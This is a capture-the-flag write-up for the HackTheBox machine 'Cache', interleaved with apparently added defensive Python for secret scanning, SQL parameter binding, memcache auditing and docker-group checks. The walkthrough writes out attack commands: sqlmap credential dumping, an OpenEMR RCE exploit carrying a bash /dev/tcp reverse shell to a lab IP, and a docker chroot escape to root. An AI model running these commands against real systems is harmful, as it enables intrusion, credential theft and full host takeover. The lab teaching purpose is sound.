Cache – HackTheBox writeup
info

Cache is a retired vulnerable Linux machine available from HackTheBox. The machine maker is ASHacker, thank you. It has a Medium difficulty with a rating of 5 out of 10.

Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. The goal is to obtain a root shell together with both the user and root flags.

Exploitation Summary

Initial Exploitation

  • Vulnerability: Credentials exposure through SQL Injection, then Remote Code Execution via OpenEMR
  • Explanation: The OpenEMR software has multiple vulnerabilities. SQL Injection on the page add_edit_event_user.php gets us the credentials needed to exploit the Remote Code Execution vulnerability

Lateral Movement – from www-data

  • Vulnerability: Credentials exposure through web file
  • Explanation: Credentials are exposed in the JavaScript file functionality.js

Lateral Movement – from ash

  • Vulnerability: Credentials exposure through memcache
  • Explanation: Credentials are stored in the memcache caching service

Privilege Escalation

  • Vulnerability: Docker group vulnerability
  • Explanation: Membership of the docker group allows a user to start a container that escapes to the host and gain access as root

Enumeration

nmap -p- -A -T4 10.10.10.188
nmap
TCP 22: OpenSSH 7.6p1
TCP 80: Apache httpd 2.4.29

Initial Exploitation

Only 2 ports are open: SSH & HTTP website. Most likely port 80 would be where we find information & vulnerabilities to get in. So let’s see what we have here:

homepage

The website talks about hacking. Following links to check out other webpages shows 2 pages that are interesting: login.html and author.html. Let’s look at them one by one.

login page

When I look at the source code of the page, it shows that the login request would be sent to net.html. Also, there’s a JavaScript file called functionality.js. Let’s check out net.html first.

login.html source

That’s interesting: typically .html files are static and would not be able to process requests. Let’s try to access it directly.

It redirects back to login.html. But if you try to access it using view-source:, you can see the source code of net.html (of course you can also use curl).

net.html

It is a simple page that shows an image:

net image

That’s a cool image but other than that login.html doesn’t lead us to more interesting things. Now take a look at functionality.js:

functionality.js

This JavaScript reveals that the login credentials and the validation logic are hard-coded in the file. We can find the user ash with password H@v3_fun. Using the credentials to log in brings us to the net.html page. A quick attempt with the same credentials over SSH fails. That’s about as far as we can go from here, but we do have credentials that may be useful later on.
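The finding above is a textbook case of credentials shipped to the client. As an added example (not code from the writeup or from the box), here is a small Python scanner that flags credential-like string literals in JavaScript source and prints them redacted, so the same mistake can be caught in review or CI before deployment. The sample script it scans is constructed for the demonstration and every value in it is a placeholder.

```python
import re

# Constructed sample modelled on a client-side login check of the kind the writeup
# describes in functionality.js; every value below is a placeholder, not the page's.
SAMPLE_JS = """
function checkCorrectPasswordAndUsername() {
    var username = document.getElementById("username").value;
    var password = document.getElementById("password").value;
    if (username == "demo_user" && password == "Pl4ceh0lder!") {
        window.location.href = "net.html";
    }
}
var apiKey = "AKIA_EXAMPLE_NOT_REAL";
var count = 0;
"""

# Identifiers whose literal string values usually mean a secret is hard-coded.
# Each pattern captures the identifier (group 1) and the literal (group 2).
SECRET_PATTERNS = [
    re.compile(r'\b(password|passwd|pwd|secret|token|api_?key)\b\s*(?:===|==|=|:)\s*["\']([^"\']+)["\']', re.I),
    re.compile(r'\b(username|user)\b\s*(?:===|==|=|:)\s*["\']([^"\']+)["\']', re.I),
]


def find_hardcoded_credentials(source):
    """Return (line_number, identifier, literal) for every credential-like literal, in file order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pattern in SECRET_PATTERNS:
            for m in pattern.finditer(line):
                findings.append((lineno, m.start(), m.group(1).lower(), m.group(2)))
    findings.sort()
    return [(lineno, name, value) for lineno, _, name, value in findings]


def redact(value):
    """Keep only the first character so a report can be shared without leaking the value."""
    return value[:1] + "*" * (len(value) - 1)


def report(source):
    """Human-readable, redacted findings for a scanned file."""
    return [f"line {n}: {name} = {redact(val)}" for n, name, val in find_hardcoded_credentials(source)]


if __name__ == "__main__":
    for entry in report(SAMPLE_JS):
        print(entry)
```

The patterns deliberately match comparisons (`==`, `===`) as well as assignments, because a client-side check like the one on this box leaks the secret through a comparison rather than an assignment. Run it over a real `.js` tree by reading each file into `find_hardcoded_credentials`.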

Let’s check the other web page author.html

author.html

This page shows CEO name ASH, domain name cache.htb and some interesting projects Cache & HMS. So ash could be a valid user of the system and the machine can possibly have virtual hosts including cache.htb.

I then add cache.htb to /etc/hosts to see if it would resolve to a different website. But unfortunately, it returns the same webpage.

Next is to try finding any sub-domains using gobuster:

gobuster vhost -u http://cache.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | grep -v "Status: 400"

I use grep -v to exclude sub-domains that return Bad Request 400 error. Those are not valid sub-domains. The search does not return any valid sub-domains. Next is trying to find another valid domain. To do that, I add htb to /etc/hosts and run another gobuster scan:

gobuster vhost -u http://htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | grep -v "Status: 400"
gobuster vhost

Great! We finally find another valid domain hms.htb. HMS (Hospital Management System) is another project author Ash is working on. Let’s check it out:

openemr

It brings us to a new website showing OpenEMR login screen. Credentials we obtained do not work here. We will ask Google for help to see if OpenEMR has any vulnerabilities.

google search

The first vulnerability I find is Remote Code Execution, exactly what we need. But we need credentials to execute this exploit. Looks like we need to find some valid credentials first.

The second highlighted link brings us to a PDF file listing a bunch of OpenEMR’s vulnerabilities. Based on section 2, we can access some URLs without authentication simply by navigating to the registration page of the Patient Portal. Section 3 then lists some URLs that are vulnerable to SQL Injection.

URLs that are affected by both section 2 & 3 are:

  • add_edit_event_user.php
  • find_appt_popup_user.php
  • get_profile.php

And based on the information, /portal is the Patient Portal page. Let’s see:

patient portal

Yup. We are able to access the Patient Portal. The credentials don’t work here either. Anyway, let’s follow the instructions to exploit the SQL Injection vulnerabilities. I go with the first URL:

http://hms.htb/portal/add_edit_event_user.php?eid=1

When I enter the URL, it brings me back to the login page. It’s a protected page but we can bypass protection by clicking on the Register button, as described in section 2 of the pdf file.

query error

We are greeted with a Query Error. Sounds good. I would now use sqlmap to test the vulnerability. To successfully run the test, we need the cookie:

  • press F12 in Firefox
  • in the developer tools, click the Console tab
  • type document.cookie
cookie

Now run the sqlmap test:

sqlmap --cookie="PHPSESSID=327f74o2sjv7t5spbpqmkd0fuv" -u http://hms.htb/portal/add_edit_event_user.php?eid=1
sqlmap

Test result confirms that the URL is vulnerable to SQL Injection. After trying out different sqlmap tests, I am able to retrieve more credentials through SQL Injection:

sqlmap --cookie="PHPSESSID=327f74o2sjv7t5spbpqmkd0fuv" -u http://hms.htb/portal/add_edit_event_user.php?eid=1 --dump -T users_secure -C username,password,salt
hash
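The Query Error seen earlier and the sqlmap result both come from the same defect: the eid request parameter is pasted into the SQL text. As an added illustration (my own code, not OpenEMR’s, using an in-memory SQLite table that stands in for the calendar table), the block below shows the vulnerable lookup next to a hardened one that validates the type and binds the value as a parameter, and mimics the page’s handler behaviour where a database exception surfaces as a "Query Error".

```python
import sqlite3


def build_demo_db():
    """In-memory stand-in for the events table that the page's eid parameter selects from (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (eid INTEGER PRIMARY KEY, title TEXT, owner TEXT)")
    conn.executemany("INSERT INTO events VALUES (?, ?, ?)", [
        (1, "Checkup", "patient_a"),
        (2, "Follow-up", "patient_b"),
        (3, "Lab results", "patient_c"),
    ])
    return conn


def vulnerable_lookup(conn, eid):
    """Vulnerable: the request parameter is concatenated into the SQL text."""
    sql = "SELECT eid, title, owner FROM events WHERE eid = " + eid
    return conn.execute(sql).fetchall()


def safe_lookup(conn, eid):
    """Hardened: reject anything that is not an integer, then bind the value as a parameter."""
    try:
        eid_int = int(eid)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT eid, title, owner FROM events WHERE eid = ?", (eid_int,)
    ).fetchall()


def run_query(lookup, conn, eid):
    """Mimic the web handler: a database exception becomes a 'Query Error' response."""
    try:
        return {"status": "ok", "rows": lookup(conn, eid)}
    except sqlite3.Error as exc:
        return {"status": "Query Error", "detail": str(exc)}


if __name__ == "__main__":
    conn = build_demo_db()
    for eid in ("1", "1 OR 1=1", "1'"):
        print("vulnerable", repr(eid), run_query(vulnerable_lookup, conn, eid))
        print("safe      ", repr(eid), run_query(safe_lookup, conn, eid))
```

The syntax-error case is the one worth remembering from a detection point of view: an application that echoes database errors back to the browser is telling the tester, and the attacker, exactly where to look. Parameter binding removes the injection; returning a generic error removes the oracle.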

Sweet! Time to call John the Ripper to recover the password:

openemr credentials

We find OpenEMR credentials: openemr_admin:xxxxxx

We can now go back to the Remote Code Execution vulnerability and try to obtain a shell. The exploit is available as 45161.py at searchsploit. We first start netcat listening to port 4000:

nc -nvlp 4000

Then execute the exploit as follows:

python 45161.py -u openemr_admin -p xxxxxx -c "bash -i >& /dev/tcp/10.10.14.35/4000 0>&1" http://hms.htb
rce exploit
Execute RCE exploit successfully
initial shell

Initial shell obtained.

Lateral Movement – from www-data

A quick check at /etc/passwd shows that ash is a valid user and we are able to login as ash using the initial credentials (H@v3_fun) obtained.

shell as ash

Great! We gain access as ash and also obtain the user flag!

Lateral Movement – from ash

When checking /etc/passwd, we also notice another user that catches my eye: memcache. memcache is software that provides in-memory caching, listening on port 11211. Looking at the listening ports confirms that the memcache service is running:

netstat -na
memcache

We can use telnet to connect to memcache service. After playing with the service for a bit, I am able to dump another set of credentials using the following command in memcache:

stats cachedump 1 0
get user
get passwd
memcache dump

Password for user luffy obtained: 0n3_p1ec3. With these credentials, I am able to log in using SSH.

luffy shell

We gain access as luffy!
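The memcache step works because the service speaks an unauthenticated text protocol and the application stored secrets in it under obvious key names. As an added example (my own code, not part of the writeup), the Python below parses the two reply formats the writeup uses, `stats cachedump` and `get`, and flags keys whose names suggest credentials, which is the check an administrator would run against their own instance. The replies it parses are constructed samples; the key names mirror the writeup’s finding but the sizes, timestamps and stored value are made up.

```python
import re

# Constructed sample of a `stats cachedump <slab> 0` reply (sizes and times are made up).
SAMPLE_CACHEDUMP = """ITEM link [21 b; 1590471489 s]
ITEM user [5 b; 1590471489 s]
ITEM passwd [9 b; 1590471489 s]
ITEM file [7 b; 1590471489 s]
ITEM account [9 b; 1590471489 s]
END
"""

# Constructed sample of a `get passwd` reply; the value is a placeholder.
SAMPLE_GET = """VALUE passwd 0 9
Sup3rS3cr
END
"""

# memcached prints each dumped key as: ITEM <key> [<bytes> b; <exptime> s]
ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")
# Key names that usually hold something an attacker wants.
SENSITIVE_KEY_RE = re.compile(r"(pass|pwd|secret|token|key|cred|auth|user|account)", re.I)


def parse_cachedump(reply):
    """Return a list of {key, size, exptime} dicts from a cachedump reply, stopping at END."""
    items = []
    for line in reply.splitlines():
        line = line.strip()
        if line == "END":
            break
        m = ITEM_RE.match(line)
        if m:
            items.append({"key": m.group(1), "size": int(m.group(2)), "exptime": int(m.group(3))})
    return items


def parse_get(reply):
    """Parse VALUE blocks ('VALUE <key> <flags> <bytes>' followed by the data line) into {key: value}."""
    values = {}
    lines = reply.splitlines()
    i = 0
    while i < len(lines):
        parts = lines[i].split()
        if parts and parts[0] == "VALUE" and len(parts) >= 4:
            key, nbytes = parts[1], int(parts[3])
            values[key] = lines[i + 1][:nbytes] if i + 1 < len(lines) else ""
            i += 2
        else:
            i += 1
    return values


def flag_sensitive_keys(items):
    """Keys from a cachedump whose names look like credentials, in dump order."""
    return [it["key"] for it in items if SENSITIVE_KEY_RE.search(it["key"])]


def redact(value):
    """Keep only the first character so the audit output can be pasted into a ticket."""
    return value[:1] + "*" * (len(value) - 1)


def audit(cachedump_reply, get_replies):
    """Combine both parsers into audit lines: flagged key, size, and a redacted value when fetched."""
    items = parse_cachedump(cachedump_reply)
    fetched = {}
    for reply in get_replies:
        fetched.update(parse_get(reply))
    lines = []
    for key in flag_sensitive_keys(items):
        size = next(it["size"] for it in items if it["key"] == key)
        value = redact(fetched[key]) if key in fetched else "<not fetched>"
        lines.append(f"sensitive key {key!r} ({size} bytes): {value}")
    return lines


if __name__ == "__main__":
    for line in audit(SAMPLE_CACHEDUMP, [SAMPLE_GET]):
        print(line)
```

Anything this audit flags should not be in the cache at all; beyond that, memcached should be bound to localhost or a private interface and, where credentials must be cached, the deployment should require SASL authentication.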

Privilege Escalation

A quick check on user luffy shows that luffy is a member of group docker.

member docker

This is not a normal group a typical user will be a member of. A quick search on Google shows that it’s possible to perform privilege escalation as a member of group docker.

docker privesc

GTFOBins is an awesome website showing you privilege escalation techniques for different programs and tools.

docker privesc command

Awesome. Running docker image ls shows the docker image I can take advantage of. I then adapt the privilege escalation command to that image, and executing it brings me to a root shell:

docker image ls
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
root shell

Perfect! We gain access as root and obtain the root flag!
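The docker group finding is easy to audit for on any host. As an added example (my own code, not from the writeup), the Python below parses an /etc/group file and reports members of groups whose membership is effectively root, with the docker group as the case this box demonstrates. The /etc/group excerpt is constructed: the user names mirror the writeup, the GIDs and other lines are made up.

```python
# Constructed /etc/group excerpt mirroring the writeup's finding (user names are the
# page's; GIDs and the remaining lines are made up for the demonstration).
SAMPLE_GROUP = """root:x:0:
sudo:x:27:ash
docker:x:999:luffy
lxd:x:108:
disk:x:6:
www-data:x:33:
backup:x:34:luffy,ash
"""

# Groups whose membership is effectively root on a typical Linux host, with the reason.
ROOT_EQUIVALENT_GROUPS = {
    "docker": "can start a container with the host filesystem bind-mounted and chroot into it",
    "lxd": "can launch a privileged container with the host filesystem mounted",
    "disk": "has raw read/write access to block devices, including the root filesystem",
}


def parse_group_file(text):
    """Parse /etc/group lines (name:password:gid:members) into {group: [members]}; bad lines are skipped."""
    groups = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            continue
        name, _, _, members = fields
        groups[name] = [m for m in members.split(",") if m]
    return groups


def find_root_equivalent_members(text, watched=ROOT_EQUIVALENT_GROUPS):
    """Return sorted (user, group, reason) tuples for every member of a watched group."""
    groups = parse_group_file(text)
    findings = []
    for group, reason in watched.items():
        for user in groups.get(group, []):
            findings.append((user, group, reason))
    return sorted(findings)


if __name__ == "__main__":
    # On a live host: find_root_equivalent_members(open("/etc/group").read())
    for user, group, reason in find_root_equivalent_members(SAMPLE_GROUP):
        print(f"{user} is in {group}: {reason}")
```

A hit for docker is not a misconfiguration of Docker itself; it is the documented consequence of giving a user control of the daemon socket. The fixes are to keep the group empty, to use rootless Docker, or to enable user namespace remapping so a container’s root no longer maps to the host’s root.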
